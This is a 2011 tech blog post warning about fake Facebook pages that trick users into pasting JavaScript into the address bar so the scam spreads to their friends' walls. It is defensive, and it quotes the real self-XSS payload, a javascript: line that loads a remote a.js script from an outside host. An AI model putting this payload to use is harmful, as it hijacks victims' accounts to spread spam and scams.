Technology Feed Lab

technology site

Posts Tagged ‘JavaScript’

The fake pages spreading on Facebook, poses risk to users

Posted by TechGeek on November 11, 2011

We are observing a lot of fake pages being created on Facebook by attackers. The idea is to create fake pages and then verifying user by following some manual steps in order to reveal the secret video behind it. The manual steps does not reveal secret video rather it will spread the page with different messages like “WOW Check this out it is cool”, “OMG have you seen this??” or “Check this out.. It is awesome!” on your friend’s wall post. Here is how message spreads,

fb msg 300x281 The fake pages spreading on Facebook, poses risk to usersThe above victim has posted messages to his all friends. Once you click on the link, you will be taken to Facebook page which looks like,

page home 300x189 The fake pages spreading on Facebook, poses risk to usersThe page post a message like “warning only 18+ verify your age by following easy steps”. This has been done intentionally by the attacker in order to do his/her malicious activity behind. Once you click on continue button, it displays another animation with some instructions to follow. Here is how they look,

instuctions 252x300 The fake pages spreading on Facebook, poses risk to users

So when you type “J” on address bar and presses Ctrl+V, it will append malicious JavaScript which is “avascript:(a=(b=document).createElement(‘script’)).src=’http://appnsnap.com/IDareYou/a.js’,b.body.appendChild(a);void(0)” to J letter which will create Javascript. So this JavaScript is responsible for spreading this message on your friend’s wall post.

Once you hit enter after pasting this script in the address bar, it will run the malicious code from “a.js” file. The code gathers all your friend’s and send them random message with link to this malicious page. The source code of  “a.js” is here. You can see the JavaScript code being used to post such messages.

Avoid visiting such pages on Facebook. Do not enter anything like JavaScript in the address bar and run it. Nothing will be revealed behind and you will become victim to such scams.

Please like us our page on Facebook and spread this blog.

pixel The fake pages spreading on Facebook, poses risk to users

Posted in Facebook | Tagged: , , , , , , , | Leave a Comment »